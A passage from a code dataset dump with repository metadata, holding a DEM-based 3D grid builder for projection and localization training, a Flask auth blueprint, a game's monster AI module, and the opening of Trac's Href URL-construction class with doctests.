dim2_list = dim2_grd.ravel()
dim1_list = dim1_grd.ravel()
alt_list = alt_grd.ravel()
return dim1_list, dim2_list, alt_list
def read_dem(dem_path):
'''
Reads the dem that covers the area of intererst,
geotiff, from the disk
dem_path: the path to the dem file
Returns:
demdb: rasterio closed dataset
demdata: numpy.2D array containing the dem
'''
with rasterio.open(dem_path) as demdb:
demdata = demdb.read(1)
return demdb, demdata
def getDataset_projection(demdb, demdata , grid_len, num_layers, projectionFunc
, train = True, margin = 0.2, **kwargs):
'''
Computes 3D pts + 2D correspondence for train or test set
Args:
demdb: rasterio db of the geotiff dem on the area of interest
demdata: the data of the dem
grid_len: the len of the grid in the two lon, lat dimensions
num_layers: the number of alt layers
projectionFunc: projection function (lon, lat, alt) -> (col, row)
train: if True, returns a training grid else returns a test grid (shifted by half a step from the train grid)
margin: the safety margin to apply to the altitude bounds when constructing the grid
kwargs: dict of params to pass to projection function
Returns:
input_locs: [lon, lat, alt] array
target: [col, row] array
'''
lon_left, lat_top = demdb.transform * (0,0)
lon_right,lat_bottom = demdb.transform * (demdb.width -1 ,demdb.height -1 )
mask = (demdata != demdb.nodata)
alt_min = np.nanmin(demdata[mask])
alt_max = np.nanmax(demdata[mask])
alt_margin = np.round((alt_max - alt_min) * margin)
alt_min -= alt_margin
alt_max += alt_margin
if train:
lon,lat, alt = pointCube(lon_left, lon_right, lat_top,
lat_bottom, alt_min ,
alt_max, grid_len, num_layers,
)
else:
lon_stp = (lon_right - lon_left)/(2 * (grid_len - 1 ) )
lat_stp = (lat_bottom - lat_top)/(2 * (grid_len - 1 ) )
alt_stp = np.round((alt_max - alt_min)/(2 * (num_layers - 1 ) ) )
lon, lat, alt = pointCube(lon_left + lon_stp , lon_right + lon_stp, lat_top + lat_stp,
lat_bottom + lat_stp, alt_min + alt_stp, alt_max + alt_stp
, grid_len, num_layers,
)
col, row = projectionFunc( lon = lon , lat = lat
, alt = alt , **kwargs)
input_locs = np.vstack((lon, lat, alt)).T
target = np.vstack((col,row)).T
return input_locs, target
def getDataset_localization(demdb, demdata, grid_len, num_layers
, im_size , localizationFunc, train = True, margin = 0.2
, **kwargs ):
'''
Computes 3D pts + 2D correspondence for train or test set
Args:
demdb: rasterio db of the geotiff dem on the area of interest
demdata: the data of the dem
grid_len: the len of the grid in the two lon, lat dimensions
num_layers: the number of alt layers
im_size: tuple(height, width) of the image
localizationFunc: localization function (col, line, alt) -> (lon, lat)
train: if True, returns a training grid else returns a test grid (shifted by half a step from the train grid)
margin: the safety margin to apply to the bounds of the image dimension and the altitude bounds when constructing the grid
kwargs: localization function additional arguments
Returns:
input_locs: [lon, lat, alt] array
target: [col, row] array
'''
# line, col limits
lines = im_size[0]
l_margin = np.round(margin * lines)
columns = im_size[1]
c_margin = np.round(margin * columns)
# alt limits, use preexisting demdb, demdata
mask = (demdata != demdb.nodata)
alt_min = np.nanmin(demdata[mask])
alt_max = np.nanmax(demdata[mask])
alt_margin = np.round((alt_max - alt_min) * margin)
if train:
c,l, alt = pointCube(-c_margin, columns + c_margin, -l_margin,
lines + l_margin, alt_min - alt_margin , alt_max + alt_margin,
grid_len, num_layers)
else:
c_stp = (columns + 2 * c_margin)/(2 * (grid_len - 1 ) )
l_stp = (lines + 2 * l_margin)/(2 * (grid_len - 1 ) )
alt_stp = np.round((alt_max - alt_min + 2 * alt_margin)/(2 * (num_layers - 1 ) ) )
c, l, alt = pointCube(-c_margin + c_stp , columns + c_margin + c_stp, -l_margin + l_stp,
lines + l_margin + l_stp, alt_min - alt_margin + alt_stp
, alt_max + alt_margin + alt_stp,
grid_len, num_layers)
lon , lat = localizationFunc(col = c, line = l, alt = alt, **kwargs)
input_locs = np.vstack((lon, lat, alt)).T
target = np.vstack((c,l)).T
return input_locs, target | 43.71831 | 126 | 0.598905 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 19 15:36:42 2020
@author: rakiki
"""
import numpy as np
import rasterio
# dataset construction
def pointCube(dim1_left, dim1_right, dim2_left, dim2_right
, alt_min, alt_max
, grid_len, num_layers):
'''
Construct a 3D meshgrid
Args:
dim1, dim2 can either be lon, lat (or lat, lon /order is irrelevant)
or row, col (or col, row /order is irrelevant )
dim1/2_left/right: the limits of the dimension range
alt_min/max: the limits of the altitude range
grid_len: the number of points to be taken in dim1/2
num_layers: the number of points to be taken in the altitude range
Returns:
dim1_list, dim2_list, alt_list: a 1D numpy array of values in each dimension
'''
# meshgrid
dim1_rg = np.linspace(dim1_left,dim1_right, grid_len)
dim2_rg = np.linspace(dim2_left, dim2_right, grid_len)
alt_rg = np.linspace(alt_min,alt_max, num_layers)
dim1_grd, dim2_grd, alt_grd = np.meshgrid(dim1_rg, dim2_rg, alt_rg)
dim2_list = dim2_grd.ravel()
dim1_list = dim1_grd.ravel()
alt_list = alt_grd.ravel()
return dim1_list, dim2_list, alt_list
def read_dem(dem_path):
'''
Reads the dem that covers the area of intererst,
geotiff, from the disk
dem_path: the path to the dem file
Returns:
demdb: rasterio closed dataset
demdata: numpy.2D array containing the dem
'''
with rasterio.open(dem_path) as demdb:
demdata = demdb.read(1)
return demdb, demdata
def getDataset_projection(demdb, demdata , grid_len, num_layers, projectionFunc
, train = True, margin = 0.2, **kwargs):
'''
Computes 3D pts + 2D correspondence for train or test set
Args:
demdb: rasterio db of the geotiff dem on the area of interest
demdata: the data of the dem
grid_len: the len of the grid in the two lon, lat dimensions
num_layers: the number of alt layers
projectionFunc: projection function (lon, lat, alt) -> (col, row)
train: if True, returns a training grid else returns a test grid (shifted by half a step from the train grid)
margin: the safety margin to apply to the altitude bounds when constructing the grid
kwargs: dict of params to pass to projection function
Returns:
input_locs: [lon, lat, alt] array
target: [col, row] array
'''
lon_left, lat_top = demdb.transform * (0,0)
lon_right,lat_bottom = demdb.transform * (demdb.width -1 ,demdb.height -1 )
mask = (demdata != demdb.nodata)
alt_min = np.nanmin(demdata[mask])
alt_max = np.nanmax(demdata[mask])
alt_margin = np.round((alt_max - alt_min) * margin)
alt_min -= alt_margin
alt_max += alt_margin
if train:
lon,lat, alt = pointCube(lon_left, lon_right, lat_top,
lat_bottom, alt_min ,
alt_max, grid_len, num_layers,
)
else:
lon_stp = (lon_right - lon_left)/(2 * (grid_len - 1 ) )
lat_stp = (lat_bottom - lat_top)/(2 * (grid_len - 1 ) )
alt_stp = np.round((alt_max - alt_min)/(2 * (num_layers - 1 ) ) )
lon, lat, alt = pointCube(lon_left + lon_stp , lon_right + lon_stp, lat_top + lat_stp,
lat_bottom + lat_stp, alt_min + alt_stp, alt_max + alt_stp
, grid_len, num_layers,
)
col, row = projectionFunc( lon = lon , lat = lat
, alt = alt , **kwargs)
input_locs = np.vstack((lon, lat, alt)).T
target = np.vstack((col,row)).T
return input_locs, target
def getDataset_localization(demdb, demdata, grid_len, num_layers
, im_size , localizationFunc, train = True, margin = 0.2
, **kwargs ):
'''
Computes 3D pts + 2D correspondence for train or test set
Args:
demdb: rasterio db of the geotiff dem on the area of interest
demdata: the data of the dem
grid_len: the len of the grid in the two lon, lat dimensions
num_layers: the number of alt layers
im_size: tuple(height, width) of the image
localizationFunc: localization function (col, line, alt) -> (lon, lat)
train: if True, returns a training grid else returns a test grid (shifted by half a step from the train grid)
margin: the safety margin to apply to the bounds of the image dimension and the altitude bounds when constructing the grid
kwargs: localization function additional arguments
Returns:
input_locs: [lon, lat, alt] array
target: [col, row] array
'''
# line, col limits
lines = im_size[0]
l_margin = np.round(margin * lines)
columns = im_size[1]
c_margin = np.round(margin * columns)
# alt limits, use preexisting demdb, demdata
mask = (demdata != demdb.nodata)
alt_min = np.nanmin(demdata[mask])
alt_max = np.nanmax(demdata[mask])
alt_margin = np.round((alt_max - alt_min) * margin)
if train:
c,l, alt = pointCube(-c_margin, columns + c_margin, -l_margin,
lines + l_margin, alt_min - alt_margin , alt_max + alt_margin,
grid_len, num_layers)
else:
c_stp = (columns + 2 * c_margin)/(2 * (grid_len - 1 ) )
l_stp = (lines + 2 * l_margin)/(2 * (grid_len - 1 ) )
alt_stp = np.round((alt_max - alt_min + 2 * alt_margin)/(2 * (num_layers - 1 ) ) )
c, l, alt = pointCube(-c_margin + c_stp , columns + c_margin + c_stp, -l_margin + l_stp,
lines + l_margin + l_stp, alt_min - alt_margin + alt_stp
, alt_max + alt_margin + alt_stp,
grid_len, num_layers)
lon , lat = localizationFunc(col = c, line = l, alt = alt, **kwargs)
input_locs = np.vstack((lon, lat, alt)).T
target = np.vstack((c,l)).T
return input_locs, target | 0 | 0 | 0 |
83e1ebe1564956bfb99de1ae2ec19d24bbf09722 | 183 | py | Python | app/auth/__init__.py | changawa-antony/personal-blog | f3df93d6fca61d9ec5eb369d6420bf4b472aa8b3 | [
"MIT"
] | null | null | null | app/auth/__init__.py | changawa-antony/personal-blog | f3df93d6fca61d9ec5eb369d6420bf4b472aa8b3 | [
"MIT"
] | null | null | null | app/auth/__init__.py | changawa-antony/personal-blog | f3df93d6fca61d9ec5eb369d6420bf4b472aa8b3 | [
"MIT"
] | null | null | null | from flask import Blueprint
# Blueprint Configuration
auth_bp = Blueprint(
'auth_bp', __name__,
template_folder='templates',
static_folder='static'
)
from . import views | 18.3 | 32 | 0.737705 | from flask import Blueprint
# Blueprint Configuration
auth_bp = Blueprint(
'auth_bp', __name__,
template_folder='templates',
static_folder='static'
)
from . import views | 0 | 0 | 0 |
70c28e9f62ec12d576e81e52faba6eba41fa491c | 16,064 | py | Python | Loading/MonsterAi.py | crablab/cs1830_project | af0767a5860e18f5c7d58464704f186552a90ee6 | [
"MIT"
] | null | null | null | Loading/MonsterAi.py | crablab/cs1830_project | af0767a5860e18f5c7d58464704f186552a90ee6 | [
"MIT"
] | null | null | null | Loading/MonsterAi.py | crablab/cs1830_project | af0767a5860e18f5c7d58464704f186552a90ee6 | [
"MIT"
] | null | null | null | import time, random, configparser
from Classes.Base.Vector import Vector
from Loading.RandomGen import getRandomMagicWeapon, getRandomMagicCast, getRandomMonster
from Classes.Super.Weapon import Weapon
from Classes.Middle.Particle import Particle
from Classes.Super.Monster import Monster
from Loading.Objects import weapon_set, visual_set, spriteDictionary, getUid, playerId
from Loading.Objects import monster_set, player_list
from Classes.Functions.Collisions.Collisions import doCirclesIntersect, isPointInRect, isCircleInRect
config = configparser.ConfigParser()
config.read_file(open('Classes/config'))
MAP_WIDTH = int(config['MAP']['WIDTH'])
MAP_HEIGHT = int(config['MAP']['HEIGHT'])
| 46.562319 | 178 | 0.573083 | import time, random, configparser
from Classes.Base.Vector import Vector
from Loading.RandomGen import getRandomMagicWeapon, getRandomMagicCast, getRandomMonster
from Classes.Super.Weapon import Weapon
from Classes.Middle.Particle import Particle
from Classes.Super.Monster import Monster
from Loading.Objects import weapon_set, visual_set, spriteDictionary, getUid, playerId
from Loading.Objects import monster_set, player_list
from Classes.Functions.Collisions.Collisions import doCirclesIntersect, isPointInRect, isCircleInRect
config = configparser.ConfigParser()
config.read_file(open('Classes/config'))
MAP_WIDTH = int(config['MAP']['WIDTH'])
MAP_HEIGHT = int(config['MAP']['HEIGHT'])
class MonsterAi:
def __init__(self, numMonsters):
self.tier1Total = int(numMonsters * 1)
self.tier2Total = int(numMonsters * 0.4)
self.tier3Total = int(numMonsters * 0.3)
self.tier1Current = 0
self.tier2Current = 0
self.tier3Current = 0
self.tier1SpawnRate = 60
self.tier2SpawnRate = 200
self.tier3SpawnRate = 500
self.tier3Respawn = 0
self.tier2Respawn = 0
self.tier1Respawn = 0
self.timeElapsed = 0
self.currentTime = time.time()
self.updateStatsTime = 0
self.moveMonstersTime = 20
self.updateTime = 0.1
def update(self):
self.updateCountdowns()
if self.updateTime > 0.1:
self.moveMonsters()
self.attack()
self.respawn()
self.updateTime = 0
if self.updateStatsTime > 100:
self.updateNum()
self.updateStatsTime = 0
self.currentTime = time.time()
def respawn(self):
if self.tier1Respawn > self.tier1SpawnRate and self.tier1Current < self.tier1Total:
self.tier1Respawn = 0
self.spawnT1()
if self.tier2Respawn > self.tier2SpawnRate and self.tier2Current < self.tier2Total:
self.tier2Respawn = 0
self.spawnT2()
if self.tier3Respawn > self.tier3SpawnRate and self.tier3Current < self.tier3Total:
self.tier3Respawn = 0
self.spawnT3()
def spawnMonsters(self):
t1 = self.tier1Total
t2 = self.tier2Total
t3 = self.tier3Total
for a in range(0, t1):
self.spawnT1()
for a in range(0, t2):
self.spawnT2()
for a in range(0, t3):
self.spawnT3()
# print(monster.spriteState)
def updateCountdowns(self):
difference = time.time() - self.currentTime
self.updateStatsTime += difference
self.moveMonstersTime += difference
self.tier1Respawn += difference
self.tier2Respawn += difference
self.tier3Respawn += difference
self.updateTime += difference
def returnMonster(self, monster):
px = random.randrange(int(monster.operationOrigin.getX() - monster.operationRange.getX()),
int(monster.operationOrigin.getX() + monster.operationRange.getX()))
py = random.randrange(int(monster.operationOrigin.getY() - monster.operationRange.getY()),
int(monster.operationOrigin.getY() + monster.operationRange.getY()))
if px > MAP_WIDTH:
px = MAP_WIDTH
if px < 0:
px = 0
if py > MAP_HEIGHT:
py = MAP_HEIGHT
if py < 0:
py = 0
monster.particle.move(Vector(px, py))
def moveMonsters(self):
# CHOOSE A RANDOM POINT WITHIN OPERATING RANGE OF MONSTER AND MOVE THE MONSTER TO THAT LOCATION IF THE VELOCITY IS 0 and not fierin
if self.moveMonstersTime > 5:
for monster in monster_set:
num = random.randrange(1, 3)
if num == 1 and not monster.hasFired and monster.particle.vel.getX() == 0 and monster.particle.vel.getY() == 0:
px = random.randrange(int(monster.operationOrigin.getX() - monster.operationRange.getX()),
int(monster.operationOrigin.getX() + monster.operationRange.getX()))
py = random.randrange(int(monster.operationOrigin.getY() - monster.operationRange.getY()),
int(monster.operationOrigin.getY() + monster.operationRange.getY()))
if px > MAP_WIDTH:
px = MAP_WIDTH
if px < 0:
px = 0
if py > MAP_HEIGHT:
py = MAP_HEIGHT
if py < 0:
py = 0
monster.particle.move(Vector(px, py))
self.moveMonstersTime = 0
def updateNum(self):
self.tier1Current = 0
self.tier2Current = 0
self.tier3Current = 0
for monster in monster_set:
if monster.tier == 1:
self.tier1Current += 1
elif monster.tier == 2:
self.tier2Current += 1
elif monster.tier == 3:
self.tier3Current += 1
def attack(self):
# VERY SIMPLE AI, IF MONSTER WITHIN OPERATION RANGE AND WITHIN ATTACK RANGE ATTACK AND KEEP RANGE IF MONSTER OUT OF OPERATION RANGE ==> IGNORE
# ONLY TAKE CARE OF LOCAL MONSTER SET, NOT EXTERNAL, BUT ATTACK BOTH PLAYERS
for monster in monster_set:
if not monster.hasFired:
# SLIGHTLY LONG, JUST CHECKING IF WITHIN BOUNDARY OF OPERATION RECT
if isCircleInRect(monster.particle.pos, monster.followDistance, monster.operationOrigin,
monster.operationRange) and not monster.returning:
# print("within rect")
# CHECK IF PLAYEisCircleInRectR WITHIN ATTACK RANGE:
for player in player_list:
# CHECK IF SELF FOLLOW DISTANCE IS IN RANGE OF PLAYER AND IF SELF MAGIC IS GREATER (WEAKER DON'T ATTACK BUT DO RETALIATE)
#THEN CHECK FOR WITHIN ATTACK RANGE
if doCirclesIntersect(monster.particle.pos, monster.followDistance, player.particle.pos,
player.particle.radius) :
monster.particle.keepRange(player.particle.pos,
monster.attackRange) # artbitrary distance at which to keep range by monster tier
print("intercection follow ",monster.particle.pos," , ", monster.followDistance," , ", player.particle.pos," , ",
player.particle.radius)
monster.particle.keepRange(player.particle.pos,
monster.attackRange)
if doCirclesIntersect(monster.particle.pos, monster.attackRange, player.particle.pos,
player.particle.radius):
self.fire(player, monster)
print("intercection attack ", monster.particle.pos, " , ", monster.attackRange,
" , ", player.particle.pos, " , ",
player.particle.radius)
else:
monster.returning = True
if not monster.hasSelectedReturn:
self.returnMonster(monster)
print("monster returning")
if isPointInRect(monster.particle.pos, monster.operationOrigin, monster.operationRange):
print("monstere returned")
monster.returning = False
monster.hasSelectedReturn = False
# IF HEALTH IS LOWER THAN PREVIOUS GENERATION I.E. ATTACKED, THEN RETALIATE ON CLOSEST OPPONENT
d1 = 0
d2 = 0
if monster.lifePrev > monster.life:
monster.lifePrev=monster.life
for player in player_list:
if player.idObject == playerId:
d1 = monster.particle.pos.copy().distanceTo(player.particle.pos)
else:
d2 = monster.particle.pos.copy().distanceTo(player.particle.pos)
for player in player_list:
if player.idObject == playerId and d1 < d2:
monster.particle.keepRange(player.particle.pos, monster.followDistance)
self.fire(player, monster)
elif player.idObject != playerId and d2 < d1:
self.fire(player, monster)
monster.particle.keepRange(player.particle.pos, monster.followDistance)
def fire(self, player, monster):
# THIS IS ESSENTIALLY COPPIED FROM CLICK HANDLER AND IMPLEMENTED FOR MONSTER ONCE IT CHOOSES A TARGET :d, NO TIME TO MAKE IT NICER ON BOTH ENDS AND OPTIMIZE UNFORTUNATELY
# SET MAGIC SPRITE ATTACK ANIMATION
numRows, numCol, startRow, startCol, endRow, endCol, key = getRandomMagicWeapon(monster.magic)
# SET MAGIC SPRITE WEAPON WITH The above
precisionX = random.randrange(0, 90)
precisionY = random.randrange(0, 90)
precisionY -= 45
precisionX -= 45
pos = player.particle.pos.copy().add(Vector(precisionX, precisionY))
radius = 0
if monster.magic < 500:
radius = 15
if monster.magic < 1000 and radius == 0:
radius = 20
if monster.magic < 5000 and radius == 0:
radius = 25
if monster.magic < 20000 and radius == 0:
radius = 30
if monster.magic < 50000 and radius == 0:
radius = 35
if monster.magic > 50000 and radius == 0:
radius = 40
weapon = Weapon(pos, Vector(0, 0), 0,
pos, 0, 0, radius, key, spriteDictionary,
20, getUid(), numRows, numCol, startRow, startCol, endRow, endCol, False, True, monster.magic)
# BIND SPRITE TO MONSTER and MONSTER TO SPRITE to remember who kills who
weapon.idPlayer = monster.idObject
weapon_set.add(weapon)
# SET MAGIC SPRITE CASTING ANIMATION USE PARTICLE CLASS ADD TO VISUAL SET
# SHIFT ALL MAGIC SPRITES UP FOR MONSTER IF SMALL
pos = monster.particle.pos.copy()
if monster.particle.dim.getY() < 120:
pos.y -= 30
numRows, numCol, startRow, startCol, endRow, endCol, key = getRandomMagicCast(monster.magic)
particle = Particle(True, pos, Vector(0, 0), 0, pos, 0, 0, 0, 0, key, spriteDictionary, 15, False, True,
getUid(), numRows, numCol, startRow, startCol, endRow, endCol)
visual_set.add(particle)
monster.particle.vel.multiply(0)
monster.particle.nextPosTime = time.time()
monster.particle.nextPos = monster.particle.pos
monster.hasFired = True
def spawnT1(
self): # WITHIN 25% OF MAP CENTER, OPERATION RANGE OF 1000, ATTACK RANGE OF 500 t1, 1500,t2, 2500 t3? for lols
# the following locations on the map X axis and y axis randomly: \_________XXXXXX___________\
pos = Vector(random.randint(int(MAP_WIDTH / 2 - MAP_WIDTH / 3), int(MAP_WIDTH / 2 + MAP_WIDTH / 3)),
random.randint(int(MAP_HEIGHT / 2 - MAP_HEIGHT / 3), int(MAP_HEIGHT / 2 + MAP_HEIGHT / 3)))
vel = Vector(0, 0)
maxVel = 100 # why not
aBack, numRows, numCol, startRow, startCol, endRow, endCol, key = getRandomMonster(1)
monster = Monster(pos, vel, 0, pos, maxVel, 0, 50, key, spriteDictionary, 15, getUid(), False, Vector(0, 0), 1,
numRows, numCol, startRow, startCol, endRow, endCol, 1, aBack, False,
random.randrange(6000, 10000), pos.copy(),
pos.copy().normalize().multiply(1000), 200, 500)
monster.setSpriteState(2)
monster.totalLife = monster.life
monster.magic = random.randrange(200, 1000)
monster.range = random.randrange(200, 1000)
monster_set.add(monster)
def spawnT2(
self): # WITHIN 25-75% OF MAP CENTER, OPERATION RANGE OF 3000, ATTACK RANGE OF 500 t1, 1500,t2, 2500 t3? for lols
topBand = Vector(random.randrange(0, int(MAP_WIDTH)),
random.randrange(int(MAP_HEIGHT * 0.1), int(MAP_HEIGHT * 0.25))) # bottom 25% of map
bottomBand = Vector(random.randrange(0, int(MAP_WIDTH)),
random.randrange(int(MAP_HEIGHT * 0.75), int(MAP_HEIGHT * 0.9))) # top 25% of map
leftBand = Vector(random.randrange(int(MAP_WIDTH * 0.1), int(MAP_WIDTH * 0.25)),
random.randrange(0, int(MAP_HEIGHT))) # left 25% of map
rightBand = Vector(random.randrange(int(MAP_WIDTH * 0.75), int(MAP_WIDTH * 0.9)),
random.randrange(0, int(MAP_HEIGHT))) # right 25% of map
num = random.randrange(0, 400)
if num > 300:
pos = topBand
elif num > 200:
pos = bottomBand
elif num > 100:
pos = leftBand
else:
pos = rightBand
maxVel = 120 # why not
vel = Vector(0, 0)
aBack, numRows, numCol, startRow, startCol, endRow, endCol, key = getRandomMonster(2)
monster = Monster(pos, vel, 0, pos, maxVel, 0, 75, key, spriteDictionary, 15, getUid(), False, Vector(0, 0), 1,
numRows, numCol, startRow, startCol, endRow, endCol, 2, aBack, False,
random.randrange(50000, 300000),pos.copy(),pos.copy().normalize().multiply(1000), 300, 700 )
monster.setSpriteState(2)
monster.totalLife = monster.life
monster.magic = random.randrange(10000, 30000)
monster.range = random.randrange(10000, 30000)
monster_set.add(monster)
def spawnT3(
self): # WITHIN 25% OF MAP CENTER, OPERATION RANGE OF 1000, ATTACK RANGE OF 500 t1, 1500,t2, 2500 t3? for lols
topBand = Vector(random.randrange(0, int(MAP_WIDTH)),
random.randrange(0, int(MAP_HEIGHT * 0.15))) # bottom 25% of map
bottomBand = Vector(random.randrange(0, int(MAP_WIDTH)),
random.randrange(int(MAP_HEIGHT * 0.85), int(MAP_HEIGHT))) # top 25% of map
leftBand = Vector(random.randrange(0, int(MAP_WIDTH * 0.15)),
random.randrange(0, int(MAP_HEIGHT))) # left 25% of map
rightBand = Vector(random.randrange(int(MAP_WIDTH * 0.85), int(MAP_WIDTH)),
random.randrange(0, int(MAP_HEIGHT))) # right 25% of map
num = random.randrange(0, 400)
if num > 300:
pos = topBand
elif num > 200:
pos = bottomBand
elif num > 100:
pos = leftBand
else:
pos = rightBand
# the following locations on the map X axis and y axis randomly: \XXXXX______________________XXXXX\
vel = Vector(0, 0)
maxVel = 200 # why not
aBack, numRows, numCol, startRow, startCol, endRow, endCol, key = getRandomMonster(3)
monster = Monster(pos, vel, 0, pos, maxVel, 0, 100, key, spriteDictionary, 15, getUid(), False, Vector(0, 0), 1,
numRows, numCol, startRow, startCol, endRow, endCol, 3, aBack, False,
random.randrange(500000, 1000000),pos.copy(),pos.copy().normalize().multiply(1000), 500, 1000
)
monster.setSpriteState(2)
monster.life = random.randrange(500000, 1000000)
monster.totalLife = monster.life
monster.magic = random.randrange(50000, 100000)
monster.operationOrigin = pos.copy()
monster_set.add(monster)
| 15,003 | -5 | 373 |
43420b779a5972d5118cb2683aaedd4b5ef5c244 | 6,930 | py | Python | trac/web/href.py | exocad/exotrac | c8207efff78d4736745e975abaa359e8bb21ffdb | [
"BSD-3-Clause"
] | null | null | null | trac/web/href.py | exocad/exotrac | c8207efff78d4736745e975abaa359e8bb21ffdb | [
"BSD-3-Clause"
] | null | null | null | trac/web/href.py | exocad/exotrac | c8207efff78d4736745e975abaa359e8bb21ffdb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2009 Edgewall Software
# Copyright (C) 2003-2004 Jonas Borgström <jonas@edgewall.com>
# Copyright (C) 2005 Christopher Lenz <cmlenz@gmx.de>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <jonas@edgewall.com>
# Christopher Lenz <cmlenz@gmx.de>
import re
from trac.util.text import unicode_quote, unicode_urlencode
slashes_re = re.compile(r'/{2,}')
class Href(object):
"""Implements a callable that constructs URLs with the given base. The
function can be called with any number of positional and keyword
arguments which then are used to assemble the URL.
Positional arguments are appended as individual segments to
the path of the URL:
>>> href = Href('/trac')
>>> href('ticket', 540)
'/trac/ticket/540'
>>> href('ticket', 540, 'attachment', 'bugfix.patch')
'/trac/ticket/540/attachment/bugfix.patch'
>>> href('ticket', '540/attachment/bugfix.patch')
'/trac/ticket/540/attachment/bugfix.patch'
If a positional parameter evaluates to None, it will be skipped:
>>> href('ticket', 540, 'attachment', None)
'/trac/ticket/540/attachment'
The first path segment can also be specified by calling an attribute
of the instance, as follows:
>>> href.ticket(540)
'/trac/ticket/540'
>>> href.changeset(42, format='diff')
'/trac/changeset/42?format=diff'
Simply calling the Href object with no arguments will return the base URL:
>>> href()
'/trac'
Keyword arguments are added to the query string, unless the value is None:
>>> href = Href('/trac')
>>> href('timeline', format='rss')
'/trac/timeline?format=rss'
>>> href('timeline', format=None)
'/trac/timeline'
>>> href('search', q='foo bar')
'/trac/search?q=foo+bar'
Multiple values for one parameter are specified using a sequence (a list or
tuple) for the parameter:
>>> href('timeline', show=['ticket', 'wiki', 'changeset'])
'/trac/timeline?show=ticket&show=wiki&show=changeset'
Alternatively, query string parameters can be added by passing a dict or
list as last positional argument:
>>> href('timeline', {'from': '02/24/05', 'daysback': 30})
'/trac/timeline?daysback=30&from=02%2F24%2F05'
>>> href('timeline', {})
'/trac/timeline'
>>> href('timeline', [('from', '02/24/05')])
'/trac/timeline?from=02%2F24%2F05'
>>> href('timeline', ()) == href('timeline', []) == href('timeline', {})
True
The usual way of quoting arguments that would otherwise be interpreted
as Python keywords is supported too:
>>> href('timeline', from_='02/24/05', daysback=30)
'/trac/timeline?from=02%2F24%2F05&daysback=30'
If the order of query string parameters should be preserved, you may also
pass a sequence of (name, value) tuples as last positional argument:
>>> href('query', (('group', 'component'), ('groupdesc', 1)))
'/trac/query?group=component&groupdesc=1'
>>> params = []
>>> params.append(('group', 'component'))
>>> params.append(('groupdesc', 1))
>>> href('query', params)
'/trac/query?group=component&groupdesc=1'
By specifying an absolute base, the function returned will also generate
absolute URLs:
>>> href = Href('http://trac.edgewall.org')
>>> href('ticket', 540)
'http://trac.edgewall.org/ticket/540'
>>> href = Href('https://trac.edgewall.org')
>>> href('ticket', 540)
'https://trac.edgewall.org/ticket/540'
In common usage, it may improve readability to use the function-calling
ability for the first component of the URL as mentioned earlier:
>>> href = Href('/trac')
>>> href.ticket(540)
'/trac/ticket/540'
>>> href.browser('/trunk/README.txt', format='txt')
'/trac/browser/trunk/README.txt?format=txt'
The ``path_safe`` argument specifies the characters that don't
need to be quoted in the path arguments. Likewise, the
``query_safe`` argument specifies the characters that don't need
to be quoted in the query string:
>>> href = Href('')
>>> href.milestone('<look,here>', param='<here,too>')
'/milestone/%3Clook%2Chere%3E?param=%3Chere%2Ctoo%3E'
>>> href = Href('', path_safe='/<,', query_safe=',>')
>>> href.milestone('<look,here>', param='<here,too>')
'/milestone/<look,here%3E?param=%3Chere,too>'
"""
_printable_safe = ''.join(map(chr, xrange(0x21, 0x7f)))
if __name__ == '__main__':
import doctest, sys
doctest.testmod(sys.modules[__name__])
| 33.640777 | 79 | 0.611688 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2009 Edgewall Software
# Copyright (C) 2003-2004 Jonas Borgström <jonas@edgewall.com>
# Copyright (C) 2005 Christopher Lenz <cmlenz@gmx.de>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <jonas@edgewall.com>
# Christopher Lenz <cmlenz@gmx.de>
import re
from trac.util.text import unicode_quote, unicode_urlencode
slashes_re = re.compile(r'/{2,}')
class Href(object):
"""Implements a callable that constructs URLs with the given base. The
function can be called with any number of positional and keyword
arguments which then are used to assemble the URL.
Positional arguments are appended as individual segments to
the path of the URL:
>>> href = Href('/trac')
>>> href('ticket', 540)
'/trac/ticket/540'
>>> href('ticket', 540, 'attachment', 'bugfix.patch')
'/trac/ticket/540/attachment/bugfix.patch'
>>> href('ticket', '540/attachment/bugfix.patch')
'/trac/ticket/540/attachment/bugfix.patch'
If a positional parameter evaluates to None, it will be skipped:
>>> href('ticket', 540, 'attachment', None)
'/trac/ticket/540/attachment'
The first path segment can also be specified by calling an attribute
of the instance, as follows:
>>> href.ticket(540)
'/trac/ticket/540'
>>> href.changeset(42, format='diff')
'/trac/changeset/42?format=diff'
Simply calling the Href object with no arguments will return the base URL:
>>> href()
'/trac'
Keyword arguments are added to the query string, unless the value is None:
>>> href = Href('/trac')
>>> href('timeline', format='rss')
'/trac/timeline?format=rss'
>>> href('timeline', format=None)
'/trac/timeline'
>>> href('search', q='foo bar')
'/trac/search?q=foo+bar'
Multiple values for one parameter are specified using a sequence (a list or
tuple) for the parameter:
>>> href('timeline', show=['ticket', 'wiki', 'changeset'])
'/trac/timeline?show=ticket&show=wiki&show=changeset'
Alternatively, query string parameters can be added by passing a dict or
list as last positional argument:
>>> href('timeline', {'from': '02/24/05', 'daysback': 30})
'/trac/timeline?daysback=30&from=02%2F24%2F05'
>>> href('timeline', {})
'/trac/timeline'
>>> href('timeline', [('from', '02/24/05')])
'/trac/timeline?from=02%2F24%2F05'
>>> href('timeline', ()) == href('timeline', []) == href('timeline', {})
True
The usual way of quoting arguments that would otherwise be interpreted
as Python keywords is supported too:
>>> href('timeline', from_='02/24/05', daysback=30)
'/trac/timeline?from=02%2F24%2F05&daysback=30'
If the order of query string parameters should be preserved, you may also
pass a sequence of (name, value) tuples as last positional argument:
>>> href('query', (('group', 'component'), ('groupdesc', 1)))
'/trac/query?group=component&groupdesc=1'
>>> params = []
>>> params.append(('group', 'component'))
>>> params.append(('groupdesc', 1))
>>> href('query', params)
'/trac/query?group=component&groupdesc=1'
By specifying an absolute base, the function returned will also generate
